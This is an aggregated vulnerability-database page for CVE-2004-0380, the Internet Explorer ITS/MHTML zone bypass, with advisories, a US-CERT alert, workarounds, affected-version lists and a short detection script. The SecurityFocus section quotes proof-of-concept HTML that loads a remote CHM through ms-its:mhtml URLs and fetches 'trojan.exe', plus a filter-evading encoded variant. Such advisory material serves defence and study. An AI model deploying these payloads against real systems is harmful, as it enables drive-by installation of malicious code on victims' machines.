CVE-2004-0380
CVSS 10.0
Published: 2004-05-04 00:00:00
Revised: 2008-09-10 15:26:08

[Original] The MHTML protocol handler in Microsoft Outlook Express 5.5 SP2 through Outlook Express 6 SP1 allows remote attackers to bypass domain restrictions and execute arbitrary code, as demonstrated on Internet Explorer using script in a compiled help (CHM) file that references the InfoTech Storage (ITS) protocol handlers such as (1) ms-its, (2) ms-itss, (3) its, or (4) mk:@MSITStore, aka the "MHTML URL Processing Vulnerability."


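[CNNVD] Microsoft Internet Explorer MT-ITS Protocol Zone Bypass Vulnerability (CNNVD-200405-008)

        Microsoft Internet Explorer is a popular web browser.
        Microsoft Internet Explorer has a flaw in how it handles URLs for the MS-ITS InfoTech protocol. A remote attacker can exploit this vulnerability by building a malicious page and luring a user into processing it, executing malicious code with system privileges.
        The vulnerability can be triggered through the MS-ITS InfoTech protocol URI handler. Using this protocol, the browser can be forced into the Local Machine security zone by redirecting to a non-existent MHTML file (using other known vulnerabilities); in that case the included malicious content, such as a malicious CHM file, executes with Local Machine privileges. Combined with other issues, an attacker can build a malicious page that, when a user is lured into visiting it, automatically downloads and executes arbitrary programs.
        This vulnerability has reportedly been exploited by Trojan.Ibiza.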
        

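- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]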

- CPE (affected platforms and products)

cpe:/a:microsoft:outlook_express:6.0  Microsoft outlook_express 6.0
cpe:/a:microsoft:outlook_express:5.5  Microsoft outlook_express 5.5

- OVAL (technical details for detection)

oval:org.mitre.oval:def:990  Microsoft Outlook Express v6.0 MHTML URL Processing Vulnerability
oval:org.mitre.oval:def:882  Microsoft Outlook Express v5.5,SP2 MHTML URL Processing Vulnerability
oval:org.mitre.oval:def:1028  Microsoft Outlook Express v6.0 for Server 2003 MHTML URL Processing Vulnerability
oval:org.mitre.oval:def:1010  Microsoft Outlook Express v6.0,SP1 MHTML URL Processing Vulnerability
*OVAL describes in detail how to detect this vulnerability; more technical details for detecting it can be found in the related OVAL definitions.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0380
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0380
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200405-008
(Official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/323070
(UNKNOWN)  CERT-VN  VU#323070
http://www.us-cert.gov/cas/techalerts/TA04-104A.html
(UNKNOWN)  CERT  TA04-104A
http://www.securityfocus.com/archive/1/358913
(VENDOR_ADVISORY)  BUGTRAQ  20040328 IE ms-its: and mk:@MSITStore: vulnerability
http://www.securityfocus.com/archive/1/354447
(VENDOR_ADVISORY)  BUGTRAQ  20040219 Microsoft Internet Explorer Unspecified CHM File Processing Arbitrary Code Execution Vulnerability (bid 9658)
http://www.microsoft.com/technet/security/bulletin/MS04-013.mspx
(VENDOR_ADVISORY)  MS  MS04-013
http://xforce.iss.net/xforce/xfdb/15705
(VENDOR_ADVISORY)  XF  outlook-mhtml-execute-code(15705)
http://www.securityfocus.com/bid/9658
(UNKNOWN)  BID  9658
http://www.k-otik.net/bugtraq/02.18.InternetExplorer.php
(UNKNOWN)  MISC  http://www.k-otik.net/bugtraq/02.18.InternetExplorer.php
http://www.securityfocus.com/bid/9105
(UNKNOWN)  BID  9105
http://secunia.com/advisories/10523
(UNKNOWN)  SECUNIA  10523

- Vulnerability information

Microsoft Internet Explorer MT-ITS Protocol Zone Bypass Vulnerability
Critical  Access validation error
2004-05-04 00:00:00 2005-10-20 00:00:00
Remote
        
        

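- Advisories and patches

        Workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Rename the following registry entry:
        HKEY_CLASSES_ROOT\PROTOCOLS\Handler\ms-its
        However, the vulnerability can still be triggered if another name is used for handling.
        Vendor patch:
        Microsoft
        ---------
        The vendor has not yet provided a patch or upgrade; we recommend that users of this software watch the vendor's home page for the latest version:

        http://www.microsoft.com/windows/ie/default.asp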

- Vulnerability information (23400)

Microsoft Outlook Express 6.0 MHTML Forced File Execution Vulnerability (1) (EDBID:23400)
windows remote
2003-11-25 Verified
0 Liu Die
N/A
source: http://www.securityfocus.com/bid/9105/info

A vulnerability has been discovered in Microsoft Outlook Express when handling MHTML file and res URIs that could lead to an unexpected file being downloaded and executed.

The problem occurs due to the component failing to securely handle MHTML file URIs that reference a non-existent resource. The affected Outlook Express component is used by Microsoft Internet Explorer. As a result, a victim browser user may inadvertently access a page designed to load an embedded object from a malicious location. This would effectively result in the execution of attacker-supplied code within the Local Zone. The vulnerability is present even if Microsoft Outlook has been removed as the default email client.

According to Microsoft, Microsoft Internet Explorer on Windows Server 2003 is prone to attacks despite its specialized configuration.

Microsoft Windows platforms running Microsoft Outlook Express 5.5SP2, 6.0, and 6.0SP1 are reported by the vendor to be affected though the issue may also be present in earlier versions of Microsoft Outlook Express.

http://www.exploit-db.com/sploits/23400.zip		

- Vulnerability information (23401)

Microsoft Outlook Express 6.0 MHTML Forced File Execution Vulnerability (2) (EDBID:23401)
windows remote
2003-11-25 Verified
0 Liu Die Yu
N/A
source: http://www.securityfocus.com/bid/9105/info
 
 
http://www.exploit-db.com/sploits/23401.zip		

- Vulnerability information (23695)

Microsoft Internet Explorer 5.0.1 ITS Protocol Zone Bypass Vulnerability (EDBID:23695)
windows remote
2004-02-13 Verified
0 Anonymous
N/A
source: http://www.securityfocus.com/bid/9658/info

Microsoft Internet Explorer has been reported prone to a vulnerability that may permit hostile content to be interpreted in the Local Zone. 

The issue may be exploited via the ITS (InfoTech Storage) Protocol URI handler. It is possible to use this protocol to force a browser into the Local Zone by redirecting into a non-existent MHTML file (using other known vulnerabilities). In this manner, it may be possible to reference hostile content to be executed in the Local Zone, such as a malicious CHM file. The issue, in combination with other vulnerabilities, is exploitable to provide for automatic delivery and execution of an arbitrary executable. This would occur when malicious web content is rendered in Internet Explorer.

Outlook products and other components that use Internet Explorer to render HTML content also present possible attack vectors for this issue.

It should be noted that there are multiple ways to invoke the protocol handler, such as through its:, ms-its:, ms-itss: and mk:@MSITStore: URIs. It has also been reported that web browsers other than Internet Explorer may also invoke the operating system URI handlers for the ITS protocol.

It has been reported that this vulnerability is actively being exploited as an infection vector for malicious code that has been dubbed Trojan.Ibiza.

**NOTE: Microsoft has released a cumulative update for Outlook Express (MS04-013) to address the MHTML-related vulnerabilities that are commonly exploited in tandem with this issue. While MS04-013 lists the same CVE candidate name as this BID, it is not currently known if this update also addresses the distinct ITS Protocol vulnerability. However, users are advised to apply the available updates, as they will reduce exposure to existing exploits that rely on the MHTML issues to exploit this or other vulnerabilities. It should be noted that if this individual vulnerability has not been addressed by the update, there may still potentially be other attack vectors which do not rely on the MHTML issues.

**Update: Symantec has observed targeted attacks "in the wild" with confirmation that systems were compromised as a result. Users are advised to ensure that the patch has been installed and take appropriate measures to avoid future attacks using potentially unpublished and unpatched vulnerabilities. This includes disabling scripting and active content by default wherever possible (use the MSIE Zone functionality to permit scripting for content from trusted domains). Avoid visiting suspicious links, such as those included in e-mail/instant messages or other untrustworthy communications. Disable HTML e-mail, if possible.

ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm

The following example demonstrates the exploitation of this issue:

The attacker would create a script (i.e., launch.html) containing a CLASSID exploit as a CHM such as:
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>

The attacker would then utilize another script tag to execute the launch.html such as:
<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME
SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>

Additional proof-of-concepts have been published by http-equiv and Jelmer that demonstrate different payloads:
http://www.malware.com/junk-de-lux.html
http://ip3e83566f.speed.planet.nl/security/newone/exploit.htm

Additional proof-of-concepts were provided in the "IE ms-its: and mk:@MSITStore: vulnerability" BugTraq post by Roozbeh Afrasiabi.

Jelmer also released the following proof-of-concept example which may potentially bypass some filters due to using encoded characters in the exploit string:

&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm

This issue is known to be exploited in the wild.		
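
The entry above notes that the handler can be invoked under several names and that encoded characters may slip past filters, so a content filter has to decode first and match afterwards. The following is an added detection sketch, not code from the advisories or from any vendor: the function names, severity labels and sample strings are constructed for illustration, and percent-decoding is an added generalization beyond the entity-encoded case shown above.

```python
"""Flag ITS-protocol URLs in HTML or e-mail bodies (added example)."""
import html
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import unquote

# Handler names listed on this page: its:, ms-its:, ms-itss:, mk:@MSITStore:
# The lookbehind keeps "its:" from matching inside words such as "visits:".
_ITS = r"(?<![A-Za-z0-9+.\-])(?P<handler>ms-itss?|its|mk:@msitstore):"
# ITS handler wrapping mhtml:<container>!<inner>; <inner> names the CHM source.
_NESTED = re.compile(
    _ITS + r"mhtml:(?P<container>[^!\s'\"<>]+)!(?P<inner>[^\s'\"<>]+)",
    re.IGNORECASE,
)
_ANY_ITS = re.compile(_ITS, re.IGNORECASE)
# Inner reference that points off the local machine (URL or UNC path).
_REMOTE = re.compile(r"(?:https?|ftp)://|\\\\", re.IGNORECASE)
_ORDER = {"info": 1, "medium": 2, "high": 3}


@dataclass(frozen=True)
class Finding:
    level: str        # "high", "medium" or "info" (labels are assumptions)
    handler: str      # ITS handler name, lower-cased
    url: str          # matched text after decoding
    obfuscated: bool  # True when the match only appears after decoding


def normalise(text: str, max_rounds: int = 5) -> str:
    """Undo HTML character references and percent-encoding until stable."""
    for _ in range(max_rounds):
        decoded = unquote(html.unescape(text))
        if decoded == text:
            break
        text = decoded
    return text


def scan(content: str) -> List[Finding]:
    """Return findings for ITS handler references in untrusted content."""
    decoded = normalise(content)
    raw_lower = content.lower()
    findings: List[Finding] = []
    covered = []  # spans already reported as nested ITS+mhtml URLs
    for m in _NESTED.finditer(decoded):
        # ITS + mhtml + remote inner reference is the shape the advisories show.
        level = "high" if _REMOTE.match(m.group("inner")) else "medium"
        url = m.group(0)
        findings.append(Finding(level, m.group("handler").lower(), url,
                                url.lower() not in raw_lower))
        covered.append(m.span())
    for m in _ANY_ITS.finditer(decoded):
        if any(start <= m.start() < end for start, end in covered):
            continue
        # A bare ITS link is normal in local help content, unusual in web mail.
        prefix = m.group(0)
        findings.append(Finding("info", m.group("handler").lower(), prefix,
                                prefix.lower() not in raw_lower))
    return findings


def triage(content: str) -> str:
    """Highest severity found, or "clean" when nothing matched."""
    levels = [f.level for f in scan(content)]
    return max(levels, key=_ORDER.get) if levels else "clean"


# Constructed sample inputs, modelled on the URL shapes quoted on this page.
SAMPLE_PLAIN = (r"<img src='ms-its:mhtml:file://C:\ss.MHT!"
                r"http://www.example.com//chm.chm::/files/launch.htm'>")
SAMPLE_ENTITY = (r'<iframe src="&#109;s-its:mhtml:file://C:\foo.mht!'
                 r'http://www.example.com/EXPLOIT.CHM::/exploit.htm">')
SAMPLE_HELP = r"<a href='ms-its:C:\WINDOWS\Help\example.chm::/topic.htm'>help</a>"
SAMPLE_BENIGN = "Daily visits: 12. See https://www.example.com/its-guide for details."

if __name__ == "__main__":
    for name, sample in [("plain", SAMPLE_PLAIN), ("entity", SAMPLE_ENTITY),
                         ("help", SAMPLE_HELP), ("benign", SAMPLE_BENIGN)]:
        print(name, triage(sample), scan(sample))
```

The `obfuscated` flag is worth alerting on by itself: a handler name that only appears after decoding has no legitimate reason to be written that way.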

- Vulnerability information (F33047)

Technical Cyber Security Alert 2004-99A (PacketStormID:F33047)
2004-04-09 00:00:00
US-CERT,Art Manion  cert.org
advisory,web,arbitrary
CVE-2004-0380

CERT Advisory TA04-099A - A cross-domain scripting vulnerability in Microsoft Internet Explorer (IE) could allow an attacker to execute arbitrary code with the privileges of the user running IE. The attacker could also read and manipulate data on web sites in other domains or zones.


Vulnerability in Internet Explorer ITS Protocol Handler

   Original release date: April 8, 2004
   Last revised: --
   Source: US-CERT

Systems Affected

     * Microsoft Windows systems running Internet Explorer

Overview

   A cross-domain scripting vulnerability in Microsoft Internet Explorer
   (IE) could allow an attacker to execute arbitrary code with the
   privileges of the user running IE. The attacker could also read and
   manipulate data on web sites in other domains or zones.

I. Description

   There is a cross-domain scripting vulnerability in the way ITS
   protocol handlers determine the security domain of an HTML component
   stored in a Compiled HTML Help (CHM) file. The HTML Help system
   "...uses the underlying components of Microsoft Internet Explorer to
   display help content. It supports HTML, ActiveX, Java, [and] scripting
   languages (JScript, and Microsoft Visual Basic Scripting Edition)."
   CHM files use the InfoTech Storage (ITS) format to store components
   such as HTML files, graphic files, and ActiveX objects. IE provides
   several protocol handlers that can access ITS files and individual CHM
   components: its:, ms-its:, ms-itss:, and mk:@MSITStore:. IE also has
   the ability to access parts of MIME Encapsulation of Aggregate HTML
   Documents (MHTML) using the mhtml: protocol handler.

   When IE references an inaccessible or non-existent MHTML file using
   the ITS and mhtml: protocols, the ITS protocol handlers can access a
   CHM file from an alternate source. IE incorrectly treats the CHM file
   as if it were in the same domain as the unavailable MHTML file. Using
   a specially crafted URL, an attacker can cause arbitrary script in a
   CHM file to be executed in a different domain, violating the
   cross-domain security model.

   Any programs that use the WebBrowser ActiveX control or the IE HTML
   rendering engine (MSHTML) may be affected by this vulnerability.
   Internet Explorer, Outlook, and Outlook Express are all examples of
   such programs. Any programs, including other web browsers, that use
   the IE protocol handlers (URL monikers) could function as attack
   vectors. Also, due to the way that IE determines MIME types, HTML and
   CHM files may not have the expected file name extensions (.htm/.html
   and .chm respectively).

   NOTE: Using an alternate web browser may not mitigate this
   vulnerability. It may be possible for a web browser other than IE on a
   Windows system to invoke IE to handle ITS protocol URLs.

   US-CERT is tracking this issue as VU#323070. This reference number
   corresponds to CVE candidate CAN-2004-0380.

II. Impact

   By convincing a victim to view an HTML document such as a web page or
   HTML email message, an attacker could execute script in a different
   security domain than the one containing the attacker's document. By
   causing script to be run in the Local Machine Zone, the attacker could
   execute arbitrary code with the privileges of the user running IE. The
   attacker could also read or modify data in other web sites (including
   reading cookies or content and modifying or creating content).

   Publicly available exploit code exists for this vulnerability. US-CERT
   has monitored incident reports that indicate that this vulnerability
   is being exploited. The Ibiza trojan, variants of W32/Bugbear, and
   BloodHound.Exploit.6 are some examples of malicious code that exploit
   this vulnerability. It is important to note that any arbitrary
   executable payload could be delivered via this vulnerability, and
   different anti-virus vendors may identify malicious code with
   different names.

   A malicious web site or email message may contain HTML similar to the
   following:

     ms-_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//exploit_chm::exploit_html

     (This URL is intentionally modified to avoid detection by
     anti-virus software.)

   In this example, HTML and script in exploit.html will be executed in
   the security context of the Local Machine Zone. It is common practice
   for exploit.html to either contain or download an executable payload
   such as a backdoor, trojan horse, virus, bot, or other malicious code.

   Note that it is possible to encode a URL in an attempt to bypass HTTP
   content inspection or anti-virus software.

III. Solution

   Currently, there is no complete solution for this vulnerability. Until
   a patch is available, consider the workarounds listed below.

   Disable ITS protocol handlers

   Disabling ITS protocol handlers appears to prevent exploitation of
   this vulnerability. Delete or rename the following registry keys:

     HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk}

   Disabling these protocol handlers will significantly reduce the
   functionality of the Windows Help system and may have other unintended
   consequences. Plan to undo these changes after patches have been
   tested and installed.

   Follow good Internet security practices

   These recommended security practices will help to reduce exposure to
   attacks and mitigate the impact of cross-domain vulnerabilities.

     * Disable Active scripting and ActiveX controls

       NOTE: Disabling Active scripting and ActiveX controls will not
       prevent the exploitation of this vulnerability.

       Disabling Active scripting and ActiveX controls in the Internet
       and Local Machine Zones may stop certain types of attacks and will
       prevent exploitation of different cross-domain vulnerabilities.

       Disable Active scripting and ActiveX controls in any zones used to
       read HTML email.

       Disabling Active scripting and ActiveX controls in the Local
       Machine Zone will prevent malicious code that requires Active
       scripting and ActiveX controls from running. Changing these
       settings may reduce the functionality of scripts, applets, Windows
       components, or other applications. See Microsoft Knowledge Base
       Article 833633 for detailed information about security settings
       for the Local Machine Zone. Note that Service Pack 2 for Windows
       XP includes these changes.

     * Do not follow unsolicited links

       Do not click on unsolicited URLs received in email, instant
       messages, web forums, or Internet relay chat (IRC) channels.

     * Maintain updated anti-virus software

       Anti-virus software with updated virus definitions may identify
       and prevent some exploit attempts. Variations of exploits or
       attack vectors may not be detected. Do not rely solely on
       anti-virus software to defend against this vulnerability. More
       information about viruses and anti-virus vendors is available on
       the US-CERT Computer Virus Resources page.

Appendix B. References

     * Vulnerability Note VU#323070 -
       <http://www.kb.cert.org/vuls/id/323070>

     * US-CERT Computer Virus Resources -
       <http://www.us-cert.gov/other_sources/viruses.html>

     * CVE CAN-2004-0380 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>

     * Introduction to URL Security Zones -
       <http://msdn.microsoft.com/workshop/security/szone/overview/overview.asp>

     * About Cross-Frame Scripting and Security -
       <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp>

     * MIME Type Determination in Internet Explorer -
       <http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp>

     * URL Monikers -
       <http://msdn.microsoft.com/workshop/networking/moniker/monikers.asp>

     * Asynchronous Pluggable Protocols -
       <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable.asp>

     * Microsoft HTML Help 1.4 SDK -
       <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Start.asp>

     * Microsoft Knowledge Base Article 182569 -
       <http://support.microsoft.com/default.aspx?scid=182569>

     * Microsoft Knowledge Base Article 174360 -
       <http://support.microsoft.com/default.aspx?scid=174360>

     * Microsoft Knowledge Base Article 833633 -
       <http://support.microsoft.com/default.aspx?scid=833633>

     * Windows XP Service Pack 2 Technical Preview -
       <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.mspx>

     * AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990>
     _________________________________________________________________

   This vulnerability was reported by Thor Larholm.
     _________________________________________________________________

   Feedback can be directed to the author: Art Manion.
     _________________________________________________________________

   Copyright 2004 Carnegie Mellon University.

   Terms of use:

	 <http://www.us-cert.gov/legal.html>

   Revision History

   April 8, 2004: Initial release
    

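- Vulnerability information

3307
Microsoft IE showHelp() Zone Restriction Bypass

- Vulnerability description

Unknown or Incomplete

- Timeline

2004-01-02 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information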

Microsoft Internet Explorer ITS Protocol Zone Bypass Vulnerability
Design Error 9658
Yes No
2004-02-13 12:00:00 2009-07-12 02:06:00
The discoverer of this issue is currently unknown, however this issue was reported to Symantec by Thor Larholm of PivX Solutions. Information has also been provided by Isabelle of K-OTik Security <http://www.k-otik.com>.

- Affected software versions

Microsoft Internet Explorer 5.0.1 SP4
- Microsoft Windows 2000 Advanced Server SP4
- Microsoft Windows 2000 Datacenter Server SP4
- Microsoft Windows 2000 Professional SP4
- Microsoft Windows 2000 Server SP4
Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
+ Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
+ Microsoft

- Vulnerability Discussion

Microsoft Internet Explorer has been reported prone to a vulnerability that may permit hostile content to be interpreted in the Local Zone.

